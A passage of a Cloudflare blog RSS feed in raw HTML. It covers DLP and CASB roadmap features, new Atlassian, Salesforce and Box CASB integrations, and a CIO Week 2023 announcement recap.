    <td><a href="https://developers.cloudflare.com/cloudflare-one/policies/gateway/http-policies/#download-and-upload-file-type"><span>File type control</span></a></td>
    <td><span>DLP scans can be scoped to specific file types, such as Microsoft Office documents, PDF files, and ZIP files.</span></td>
  </tr>
  <tr>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/predefined-profiles/"><span>Expanded predefined DLP profiles</span></a></td>
    <td><span>Since launch, DLP has built out a wider variety of detections for common data types, like financial data, personal identifiers, and credentials.</span></td>
  </tr>
  <tr>
    <td><span>DLP: Detailed detections</span></td>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/insights/logs/gateway-logs/#http-logs"><span>Expanded logging details</span></a><span> </span></td>
    <td><span>Cloudflare now captures more wide-ranging and granular details of DLP-related activity in logs, including payload analysis, file names, and higher fidelity details of individual files. A large percentage of our customers prefer to push these logs to SIEM tools like </span><a href="http://staging.blog.mrk.cfdata.org/integrate-cloudflare-zero-trust-with-datadog-cloud-siem/"><span>DataDog</span></a><span> and </span><a href="http://staging.blog.mrk.cfdata.org/zero-trust-signals-to-sumo-logic/"><span>Sumo Logic</span></a><span>.</span></td>
  </tr>
  <tr>
    <td><span>CASB: Expanding integrations and findings</span></td>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/"><span>API-based integrations</span></a><br /><a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/manage-findings/"><span>Managing findings</span></a></td>
    <td><span>Today, Cloudflare integrates with 18 of the most widely used SaaS apps, including productivity suites, cloud storage, chat tools, and more. </span><br /><span>API-based scans not only reveal misconfigurations, but also offer built-in HTTP policy creation workflows and step-by-step remediation guides. </span></td>
  </tr>
  <tr>
    <td><span>DLP &amp; CASB convergence</span></td>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-dlp/"><span>Scanning for sensitive data in SaaS apps</span></a></td>
    <td><span>Today, organizations can set up CASB to scan every publicly accessible file in Google Workspace for text that matches a DLP profile (financial data, personal identifiers, etc.).</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h2>New and upcoming DLP &amp; CASB functionality</h2>
      <a href="#new-and-upcoming-dlp-casb-functionality">
        
      </a>
    </div>
    <p>Today’s launch of <a href="http://cfl.re/data-protection-press-release">Cloudflare One’s data protection suite</a> crystalizes our commitment to keep investing in DLP and CASB functionality across these thematic areas. Below we wanted to preview a few new and upcoming capabilities on the Cloudflare One’s data protection suite roadmap that will become available in the coming weeks for further visibility and controls across data environments.</p>
    <div>
      <h3><i>Exact data matching with custom wordlists</i></h3>
      <a href="#exact-data-matching-with-custom-wordlists">
        
      </a>
    </div>
    <p><b>Already shipped:</b> <a href="/edm-beta/">Exact Data Match</a>, moves from out of beta to general availability, allowing customers to tell Cloudflare’s DLP exactly what data to look for by uploading a dataset, which could include names, phone numbers, or anything else.</p><p><b>Next 30 days:</b> Customers will soon be able to upload a list of specific words, create DLP policies to search for those important keywords in files, and block and log that activity.</p><p><b>How customers benefit:</b> Administrators can be more specific about what they need to protect and save time creating policies by bulk uploading the data and terms that they care most about. Over time, many organizations have amassed long lists of terms configured for incumbent DLP services, and these customizable upload capabilities <a href="/descaler-program-update/">streamline migration from other vendors</a> to Cloudflare. Just as with all other DLP profiles, Cloudflare searches for these custom lists and keywords within in-line traffic and in integrated SaaS apps.</p>
    <div>
      <h3><i>Detecting source code and health data</i></h3>
      <a href="#detecting-source-code-and-health-data">
        
      </a>
    </div>
    <p><b>Next 30 days:</b> Soon, Clouflare’s DLP will include predefined profiles to detect developer source code and <a href="https://www.cloudflare.com/learning/privacy/what-is-hipaa-compliance/">protected health information (PHI)</a>. Initially, code data will include languages like Python, Javascript, Java, and C++ — four of the most popular languages today — and PHI data will include medication and diagnosis names — two highly sensitive medical topics.</p><p><b>How customers benefit:</b> These predefined profiles expand coverage to some of the most valuable — and in the case of PHI, one of the most regulated — types of data within an organization.</p>
    <div>
      <h3><i>Converging API-driven CASB &amp; DLP for data-at-rest protections</i></h3>
      <a href="#converging-api-driven-casb-dlp-for-data-at-rest-protections">
        
      </a>
    </div>
    <p><b>Next 30 days:</b> Soon, organizations will be able to scan for sensitive data at rest in Microsoft 365 (e.g. OneDrive). API-based scans of these environments will flag, for example, whether credit card numbers, source code, or other data configured via DLP policies reside within publicly accessible files. Administrators can then take prescriptive steps to remediate via in-line CASB gateway policies.</p><p><b>Shipping by the end of the year:</b> Within the next few months, this same integration will be available with GitHub.</p><p><b>How customers benefit:</b> Between the existing <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-dlp/">Google Workspace</a> integration and this upcoming Microsoft 365 integration, customers can scan for sensitive data across two of the most prominent cloud productivity suites — where users spend much of their time and where large percentages of organizational data lives. This new Microsoft integration represents a continued investment in streamlining security workflows across the Microsoft ecosystem — whether for <a href="/expanding-our-collaboration-with-microsoft-proactive-and-automated-zero-trust-security/">managing identity and application access</a>, <a href="/cloudflare-microsoft-intune-partner-to-give-cisos-secure-control-across-devices-applications/">enforcing device posture</a>, or <a href="https://developers.cloudflare.com/cloudflare-one/tutorials/azuread-risky-users/?cf_target_id=9878E2009FA06D9AC4B5552DD9D7E75D">isolating risky users</a>.</p><p>The GitHub integration also restores visibility over one of the most critical developer environments that is also increasingly a risk for <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/">data leaks</a>. In fact, according to <a href="https://www.gitguardian.com/state-of-secrets-sprawl-report-2023">GitGuardian</a>, 10 million hard-coded secrets were exposed in public GitHub commits in 2022, a figure that is up 67% from 2021 and only expected to grow. Preventing source code exposure on GitHub is a problem area our product team regularly hears from our customers, and we will continue to prioritize securing developer environments.</p>
    <div>
      <h3><i>Layering on Zero Trust context: User Risk Score</i></h3>
      <a href="#layering-on-zero-trust-context-user-risk-score">
        
      </a>
    </div>
    <p><b>Next 30 days:</b> Cloudflare will introduce a risk score based on user behavior and activities that have been detected across Cloudflare One’s services. Organizations will be able to detect user behaviors that introduce risk from action like an Impossible Travel anomaly or detections from too many DLP violations in a given period of time. Shortly following the detection capabilities will be the option to take preventative or remediative policy actions, within the wider Cloudflare One suite. In this way, organizations can control access to sensitive data and applications based on changing risk factors and real-time context.</p><p><b>How customers benefit:</b> Today, intensive time, labor, and money are spent on analyzing large volumes of log data to identify patterns of risk. Cloudflare's ‘out-of-the-box’ risk score simplifies that process, helping organizations gain visibility into and lock down suspicious activity with speed and efficiency.</p>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>These are just some of the capabilities on our short-term roadmap, and we can’t wait to share more with you as the data protection suite evolves. If you’re ready to explore how Cloudflare One can protect your data, <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/">request a workshop</a> with our experts today.</p><p>Or to learn more about how Cloudflare One protects data, read <a href="https://cfl.re/data-protection-press-release">today’s press release</a>, visit our <a href="https://www.cloudflare.com/zero-trust/solutions/data-protection">website</a>, or dive deeper with a <a href="https://cfl.re/data-protection-demo">technical demo</a>.</p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <guid isPermaLink="false">5UtpTLoZcB9dgL16R3HWNw</guid>
            <dc:creator>Corey Mahan</dc:creator>
            <dc:creator>James Chang</dc:creator>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Noelle Kagan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Scan and secure Atlassian with Cloudflare CASB]]></title>
            <link>https://blog.cloudflare.com/scan-atlassian-casb/</link>
            <pubDate>Tue, 14 Mar 2023 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare CASB can now integrate and scan Atlassian products, Confluence and Jira, for critical security issues, like misconfigurations, data exposure, and third-party app risks. Start scanning in just a few clicks! ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4bqsv7cI4zU4QNT0rvzPpD/4bdc86509688d9164ef464d30dce03eb/Secure-Atlassian-with-CASB---Proactively-scan-Jira-and-Confluence-for-misconfig-and-data-leaks.png" />
            
            </figure><p>As part of Security Week, two new integrations are coming to Cloudflare CASB, one for Atlassian Confluence and the other for Atlassian Jira.</p><p>We’re excited to launch support for these two new SaaS applications (in addition to <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/">those we already support</a>) given the reliance that we’ve seen organizations from around the world place in them for streamlined, end-to-end project management.</p><p>Let’s dive into what Cloudflare Zero Trust customers can expect from these new integrations.</p>
    <div>
      <h3>CASB: Security for your SaaS apps</h3>
      <a href="#casb-security-for-your-saas-apps">
        
      </a>
    </div>
    <p>First, a quick recap. <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">CASB</a>, or Cloud Access Security Broker, is one of Cloudflare’s newer offerings, released last September to provide security operators - <a href="https://www.cloudflare.com/ciso/">CISOs</a> and security engineers - clear visibility and administrative control over the security of their SaaS apps.</p><p>Whether it’s Google Workspace, Microsoft 365, Slack, Salesforce, Box, GitHub, or Atlassian (<i>whew!</i>), CASB can easily connect and scan these apps for critical security issues, and provide users an exhaustive list of identified problems, organized for triage.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16BcZ05g2b4YzwqMSK5LaU/343144f5e4abad2609340a3b244e6e0d/CASB_Atlassian_1.png" />
            
            </figure>
    <div>
      <h3>Scan Confluence with Cloudflare CASB</h3>
      <a href="#scan-confluence-with-cloudflare-casb">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3FPOXC7mEDMcwbqTVyad6S/b7e77abfe419e4afe163eaf2832b09d8/CASB_Atlassian_2.png" />
            
            </figure><p>Over time, Atlassian Confluence has become the go-to collaboration platform for teams to create, organize, and share content, such as documents, notes, and meeting minutes. However, from a security perspective, Confluence's flexibility and wide compatibility with third-party applications can pose a security risk if not properly configured and monitored.</p><p>With this new integration, IT and security teams can begin scanning for Atlassian- and Confluence-specific security issues that may be leaving sensitive corporate data at risk. Customers of CASB using Confluence Cloud can expect to identify issues like publicly shared content, unauthorized access, and other vulnerabilities that could be exploited by bad actors.</p><p>By providing this additional layer of SaaS security, Cloudflare CASB can help organizations better protect their sensitive data while still leveraging the collaborative power of Confluence.</p>
    <div>
      <h3>Scan Jira with Cloudflare CASB</h3>
      <a href="#scan-jira-with-cloudflare-casb">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4Gdd8kYQvdsZOceciHtr6a/03a2ab966df4cbba3f3cddd807d26a99/CASB_Atlassian_3.png" />
            
            </figure><p>A mainstay project management tool used to track tasks, issues, and progress on projects, Atlassian Jira has become an essential part of the software development process for teams of all sizes. At the same time, this also means that Jira has become a rich target for those looking to exploit and gain access to sensitive data.</p><p>With Cloudflare CASB, security teams can now easily identify security issues that could leave employees and sensitive business data vulnerable to compromise. Compatible with Jira Cloud accounts, Identified issues can range from flagging user and <a href="https://www.cloudflare.com/products/zero-trust/third-party-access/">third-party app access issues</a>, such as account misuse and users not following best practices, to identification of files that could be potentially overshared and worth deeper investigation.</p><p>By providing security admins with a single view to see security issues across their entire SaaS footprint, now including Jira and Confluence, Cloudflare CASB makes it easier for security teams to stay up-to-date with potential security risks.</p>
    <div>
      <h3>Getting started</h3>
      <a href="#getting-started">
        
      </a>
    </div>
    <p>With the addition of Jira and Confluence to the growing list of CASB integrations, we’re making our products as widely compatible as possible so that organizations can continue placing their trust and confidence in us to help keep them secure.</p><p>Today, Cloudflare CASB supports integrations with Google Workspace, Microsoft 365, Slack, Salesforce, Box, GitHub, Jira, and Confluence, with a growing list of other critical applications on their way, so if there’s one in particular you’d like to see soon, let us know!</p><p>For those not already using Cloudflare Zero Trust, don’t hesitate to get started today - see the platform yourself with 50 free seats by signing up <a href="https://dash.cloudflare.com/sign-up/teams">here</a>, then get in touch with our team <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/">here</a> to learn more about how Cloudflare CASB can help your organization lock down its SaaS apps.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Atlassian]]></category>
            <category><![CDATA[SaaS]]></category>
            <category><![CDATA[Security]]></category>
            <guid isPermaLink="false">4QwfEsjjziuPmIBFQqkFWT</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
        </item>
        <item>
            <title><![CDATA[CIO Week 2023 recap]]></title>
            <link>https://blog.cloudflare.com/cio-week-2023-recap/</link>
            <pubDate>Fri, 13 Jan 2023 14:01:00 GMT</pubDate>
            <description><![CDATA[ Learn about all the new products, partnerships, and innovations Cloudflare announced during CIO Week to help organizations modernize their IT and security. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2UE0B1mqbvC2In2FvI9zP3/8271edb763419010c0f8be743a5df82d/CIO-Week-2023-Recap.png" />
            
            </figure><p>In our <a href="/welcome-to-cio-week-2023/">Welcome to CIO Week 2023</a> post, we talked about wanting to start the year by celebrating the work Chief Information Officers do to keep their organizations safe and productive.</p><p>Over the past week, you learned about announcements addressing all facets of your technology stack – including new services, betas, strategic partnerships, third party integrations, and more. This recap blog summarizes each announcement and labels what capability is generally available (GA), in beta, or on our roadmap.</p><p>We delivered on critical capabilities requested by our customers – such as <a href="https://www.cloudflare.com/press-releases/2023/cloudflare-announces-comprehensive-email-security-and-data-protection-tools/">even more comprehensive phishing protection</a> and <a href="https://www.cloudflare.com/press-releases/2023/cloudflare-expands-relationship-with-microsoft-zero-trust/">deeper integrations with the Microsoft ecosystem</a>. Looking ahead, we also described our roadmap for emerging technology categories like <a href="https://www.cloudflare.com/press-releases/2023/digital-experience-monitoring-cios/">Digital Experience Monitoring</a> and our vision to make it exceedingly simple <a href="https://www.cloudflare.com/press-releases/2023/magic-wan-connector-corporate-network/">to route traffic from any source to any destination through Cloudflare’s network</a>.</p><p>Everything we launched is designed to <a href="https://www.cloudflare.com/cio/">help CIOs accelerate their pursuit of digital transformation</a>. In this blog, we organized our announcement summaries based on the three feelings we want CIOs to have when they consider partnering with Cloudflare:</p><ol><li><p><b>CIOs now have a simpler roadmap to Zero Trust and SASE:</b> We announced new capabilities and tighter integrations that make it easier for organizations to adopt <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust security</a> best practices and move towards aspirational architectures like <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">Secure Access Service Edge (SASE)</a>.</p></li><li><p><b>CIOs have access to the right technology and channel partners:</b> We announced integrations and programming to help organizations access the right expertise to modernize IT and security at their own pace with the technologies they already use.</p></li><li><p><b>CIOs can streamline a multi-cloud strategy with ease:</b> We announced new ways to connect, secure, and accelerate traffic across diverse cloud environments.</p></li></ol><p>Thank you for following <a href="https://www.cloudflare.com/cio-week/">CIO Week</a>, Cloudflare’s first of many Innovation Weeks in 2023. It can be hard to keep up with our pace of innovation sometimes, but we hope that reading this blog and <a href="https://gateway.on24.com/wcc/eh/2153307/lp/4063103/">registering for our recap webinar</a> will help!</p><p>If you want to speak with us about <a href="https://www.cloudflare.com/learning/network-layer/how-to-prepare-for-network-modernization-projects/">how to modernize your IT and security</a> and make life easier for your organization’s CIO, <a href="https://www.cloudflare.com/lp/cio-week-2023-cloudflare-one-contact-us/">fill out the form here.</a></p>
    <div>
      <h2>Simplifying your journey to Zero Trust and SASE</h2>
      <a href="#simplifying-your-journey-to-zero-trust-and-sase">
        
      </a>
    </div>
    <p><i><b>Securing access</b></i>These blog posts are focused on making it faster, easier, and safer to connect any user to any application with the granular controls and comprehensive visibility needed to achieve Zero Trust.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Beta: </span><a href="http://staging.blog.mrk.cfdata.org/introducing-digital-experience-monitoring/"><span>Introducing Digital Experience Monitoring</span></a></td>
    <td><span>Cloudflare Digital Experience Monitoring will be an all-in-one dashboard that helps CIOs understand how critical applications and Internet services are performing across their entire corporate network. </span><a href="https://cloudflare.com/lp/digital-experience-monitoring/"><span>Sign up for beta access. </span></a></td>
  </tr>
  <tr>
    <td><span>Beta: </span><a href="http://staging.blog.mrk.cfdata.org/warp-to-warp/"><span>Weave your own global, private, virtual Zero Trust network on Cloudflare with WARP-to-WARP</span></a></td>
    <td><span>With a single click, any device running Cloudflare’s device client, WARP, in your organization can reach any other device running WARP over a private network. </span><a href="https://www.cloudflare.com/lp/warp-peering/"><span>Sign up for beta access.</span></a></td>
  </tr>
  <tr>
    <td><span>GA:</span><span> </span><a href="http://staging.blog.mrk.cfdata.org/403-logs-cloudflare-access/"><span>New ways to troubleshoot Cloudflare Access 'blocked' messages</span></a></td>
    <td><span>Investigate ‘allow’ or ‘block’ decisions based on how a connection was made with the same level of ease that you can troubleshoot user identity within Cloudflare’s Zero Trust platform.</span></td>
  </tr>
  <tr>
    <td><span>Beta: </span><a href="http://staging.blog.mrk.cfdata.org/one-click-zerotrust-isolation/"><span>One-click data security for your internal and SaaS applications</span></a></td>
    <td><span>Secure sensitive data by running application sessions in an isolated browser and control how users interact with sensitive data – now with just one click. </span><a href="https://www.cloudflare.com/lp/application-isolation-beta/"><span>Sign up for beta access.</span></a></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/access-and-gateway-with-scim/"><span>Announcing SCIM support for Cloudflare Access &amp; Gateway</span></a></td>
    <td><span>Cloudflare’s ZTNA (Access) and SWG (Gateway) services now support the System for Cross-domain Identity Management (SCIM) protocol, making it easier for administrators to manage identity records across systems.</span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/the-most-exciting-ping-release"><span>Cloudflare Zero Trust: The Most Exciting Ping Release Since 1983</span></a></td>
    <td><span>Cloudflare Zero Trust administrators can use familiar debugging tools that use the ICMP protocol (like Ping, Traceroute, and MTR) to test connectivity to private network destinations.</span></td>
  </tr>
</tbody>
</table><p><i><b>Threat defense</b></i>These blog posts are focused on helping organizations filter, inspect, and isolate traffic to protect users from phishing, ransomware, and other Internet threats.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>GA:</span><span> </span><a href="http://staging.blog.mrk.cfdata.org/area1-eli-ga"><span>Email Link Isolation: your safety net for the latest phishing attacks</span></a></td>
    <td><span>Email Link Isolation is your safety net for the suspicious links that end up in inboxes and that users may click. This added protection turns </span><a href="https://www.cloudflare.com/products/zero-trust/email-security/"><span>Cloudflare Area 1</span></a><span> into the most comprehensive email security solution when it comes to protecting against phishing attacks.</span></td>
  </tr>
  <tr>
    <td><span>GA:</span><span> </span><a href="http://staging.blog.mrk.cfdata.org/bring-your-certificates-cloudflare-gateway/"><span>Bring your own certificates to Cloudflare Gateway</span></a></td>
    <td><span>Administrators can use their own custom certificates to apply HTTP, DNS, CASB, DLP, RBI and other filtering policies.</span></td>
  </tr>
  <tr>
    <td><span>GA:</span><span> </span><a href="http://staging.blog.mrk.cfdata.org/custom-dlp-profiles/"><span>Announcing Custom DLP profiles</span></a></td>
    <td><span>Cloudflare’s Data Loss Prevention (DLP) service now offers the ability to create custom detections, so that organizations can inspect traffic for their most sensitive data.</span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/gateway-managed-service-provider"><span>Cloudflare Zero Trust for Managed Service Providers</span></a></td>
    <td><span>Learn how the U.S. Federal Government and other large Managed Service Providers (MSPs) are using Cloudflare’s Tenant API to apply security policies like DNS filtering across the organizations they manage.</span></td>
  </tr>
</tbody>
</table><p><b><i>Secure SaaS environments</i></b>These blog posts are focused on maintaining consistent security and visibility across SaaS application environments, in particular to protect leaks of sensitive data.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Roadmap: </span><a href="http://staging.blog.mrk.cfdata.org/casb-dlp/"><span>How Cloudflare CASB and DLP work together to protect your data</span></a></td>
    <td><span>Cloudflare Zero Trust will introduce capabilities between our CASB and DLP services that will enable administrators to peer into the files stored in their SaaS applications and identify sensitive data inside them.</span></td>
  </tr>
  <tr>
    <td><span>Roadmap: </span><a href="http://staging.blog.mrk.cfdata.org/dlp-area1-to-protect-data-in-email/"><span>How Cloudflare Area 1 and DLP work together to protect data in email</span></a></td>
    <td><span>Cloudflare is combining capabilities from Area 1 Email Security and Data Loss Prevention (DLP) to provide complete data protection for corporate email. </span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/casb-adds-salesforce-and-box-integrations"><span>Cloudflare CASB: Scan Salesforce and Box for security issues</span></a></td>
    <td><span>Cloudflare CASB now integrates with Salesforce and Box, enabling IT and security teams to scan these SaaS environments for security risks.</span></td>
  </tr>
</tbody>
</table><p><i><b>Accelerating and securing connectivity</b></i>In addition to product capabilities, blog posts in this section highlight speed and other strategic benefits that organizations realize with Cloudflare.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/why-cios-select-cloudflare-one/"><span>Why do CIOs choose Cloudflare One?</span></a></td>
    <td><span>As part of CIO Week, we spoke with the leaders of some of our largest customers to better understand why they selected Cloudflare One. Learn six thematic reasons why.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/network-performance-update-cio-edition/"><span>Cloudflare is faster than Zscaler</span></a></td>
    <td><span>Cloudflare is 38-55% faster at delivering Zero Trust experiences than Zscaler, as validated by </span><a href="https://www.cloudflare.com/lp/miercom-report-cloudflare-vs-zscaler/?cf_target_id=1C6571CB318780CED4741A383010B000"><span>third party testing</span></a><span>.</span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/location-aware-warp/"><span>Network detection and settings profiles for the Cloudflare One agent</span></a></td>
    <td><span>Cloudflare's device client (WARP) can now securely detect pre-configured locations and route traffic based on the needs of the organization for that location.</span></td>
  </tr>
</tbody>
</table><p><b><i>Making Cloudflare easier to use</i></b>These blog posts highlight innovations across the Cloudflare portfolio, and outside the Zero Trust and SASE categories, to help organizations secure and accelerate traffic with ease.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/preview-today/"><span>Preview any Cloudflare product today</span></a></td>
    <td><span>Enterprise customers can now start previewing non-contracted services with a single click in the dashboard. </span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/improved-api-access-control/"><span>Improved access controls: API access can now be selectively disabled</span></a></td>
    <td><span>Cloudflare is making it easier for account owners to view and manage the access their users have on an account by allowing them to restrict API access to the account.</span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/zone-versioning-ga"><span>Zone Versioning is now generally available</span></a></td>
    <td><span>Zone Versioning allows customers to safely manage zone configuration by versioning changes and choosing how and when to deploy those changes to defined environments of traffic. </span></td>
  </tr>
  <tr>
    <td><span>Roadmap: </span><a href="http://staging.blog.mrk.cfdata.org/app-services-private-networks"><span>Cloudflare Application Services for private networks: do more with the tools you already love</span></a></td>
    <td><span>Cloudflare is unlocking operational efficiencies by working on integrations between our <a href="https://www.cloudflare.com/application-services/">Application Services</a> to protect Internet-facing websites and our Cloudflare One platform to protect corporate networks. </span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Collaborating with the right partners</h3>
      <a href="#collaborating-with-the-right-partners">
        
      </a>
    </div>
    <p>In addition to new programming for our channel partners, these blog posts describe deeper technical integrations that help organizations work more efficiently with the IT and security tools they already use.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/expanding-our-collaboration-with-microsoft-proactive-and-automated-zero-trust-security/"><span>Expanding our Microsoft collaboration: Proactive and automated Zero Trust security for customers</span></a></td>
    <td><span>Cloudflare announced four new integrations between Microsoft Azure Active Directory (Azure AD) and Cloudflare Zero Trust that reduce risk proactively. These integrated offerings increase automation, allowing security teams to focus on threats versus implementation and maintenance. </span></td>
  </tr>
  <tr>
    <td><span>Beta: </span><a href="http://staging.blog.mrk.cfdata.org/api-based-email-scanning"><span>API-based email scanning</span></a></td>
    <td><span>Now, Microsoft Office 365 customers can deploy Area 1 cloud email security via Microsoft Graph API. This feature enables O365 customers to quickly deploy the Area 1 product via API, with onboarding through the Microsoft Marketplace coming in the near future.</span></td>
  </tr>
  <tr>
    <td><span>GA: </span><a href="http://staging.blog.mrk.cfdata.org/china-express"><span>China Express: Cloudflare partners to boost performance in China for corporate networks</span></a></td>
    <td><span>China Express is a suite of offerings designed to simplify connectivity and improve performance for users in China and developed in partnership with China Mobile International and China Broadband Communications.</span></td>
  </tr>
  <tr>
    <td><span>Beta: </span><a href="http://staging.blog.mrk.cfdata.org/cloudflare-one-authorized-services-delivery-partner-track/"><span>Announcing the Authorized Partner Service Delivery Track for Cloudflare One</span></a></td>
    <td><span>Cloudflare announced the limited availability of a new specialization track for our channel and implementation partners, designed to help develop their expertise in delivering Cloudflare One services. </span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Streamlining your multi-cloud strategy</h3>
      <a href="#streamlining-your-multi-cloud-strategy">
        
      </a>
    </div>
    <p>These blog posts highlight innovations that make it easier for organizations to simply ‘plug into’ Cloudflare’s network and send traffic from any source to any destination.</p>
<table>
<thead>
  <tr>
    <th><span>Blog</span></th>
    <th><span>Summary</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Beta</span><span>: </span><a href="http://staging.blog.mrk.cfdata.org/magic-wan-connector/"><span>Announcing the Magic WAN Connector: the easiest on-ramp to your next generation network</span></a></td>
    <td><span>Cloudflare is making it even easier to get connected with the Magic WAN Connector: a lightweight software package you can install in any physical or cloud network to automatically connect, steer, and shape any IP traffic. </span><a href="https://www.cloudflare.com/lp/magic-wan-connector/"><span>Sign up for early access.</span></a></td>
  </tr>
  <tr>
    <td><span>GA</span><span>: </span><a href="http://staging.blog.mrk.cfdata.org/cloud-cni"><span>Cloud CNI privately connects your clouds to Cloudflare</span></a></td>
    <td><span>Customers using Google Cloud Platform, Azure, Oracle Cloud, IBM Cloud, and Amazon Web Services can now open direct connections from their private cloud instances into Cloudflare.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/cardinal-directions-and-network-traffic/"><span>Cloudflare protection for all your cardinal directions</span></a></td>
    <td><span>This blog post recaps how definitions of corporate network traffic have shifted and how Cloudflare One provides protection for all traffic flows, regardless of source or destination.</span></td>
  </tr>
</tbody>
</table>
    <div>
      <h3>Watch on Cloudflare TV</h3>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div></div><p></p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[CIO Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[Area 1 Security]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[CASB]]></category>
            <guid isPermaLink="false">477jyoRer3hkZsismayuDK</guid>
            <dc:creator>James Chang</dc:creator>
            <dc:creator>Corey Mahan</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare's CASB integration with Salesforce and Box]]></title>
            <link>https://blog.cloudflare.com/casb-adds-salesforce-and-box-integrations/</link>
            <pubDate>Thu, 12 Jan 2023 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare CASB adds two new SaaS integrations for Salesforce and Box. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/51lE809bNl9pljZYRATeg5/d88e19cd9eb2943142e80a4a1431fbb0/image2-23.png" />
            
            </figure><p>Today, we’re sharing the release of two new SaaS integrations for Cloudflare CASB - Salesforce and Box - in order to help <a href="https://www.cloudflare.com/cio/">CIOs</a>, IT leaders, and security admins swiftly identify looming security issues present across the exact type of tools housing this business-critical data.</p>
    <div>
      <h3>Recap: What is Cloudflare CASB?</h3>
      <a href="#recap-what-is-cloudflare-casb">
        
      </a>
    </div>
    <p><a href="/casb-ga/">Released in September</a>, Cloudflare’s API CASB has already proven to organizations from around the world that security risks - like insecure settings and inappropriate file sharing - can often exist across the friendly SaaS apps we all know and love, and indeed pose a threat. By giving operators a comprehensive view of the issues plaguing their SaaS environments, Cloudflare CASB has allowed them to effortlessly <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">remediate problems</a> in a timely manner before they can be leveraged against them.</p><p>But as both we and other forward-thinking administrators have come to realize, it’s not always Microsoft 365, Google Workspace, and business chat tools like Slack that contain an organization’s most sensitive information.</p>
    <div>
      <h3>Scan Salesforce with Cloudflare CASB</h3>
      <a href="#scan-salesforce-with-cloudflare-casb">
        
      </a>
    </div>
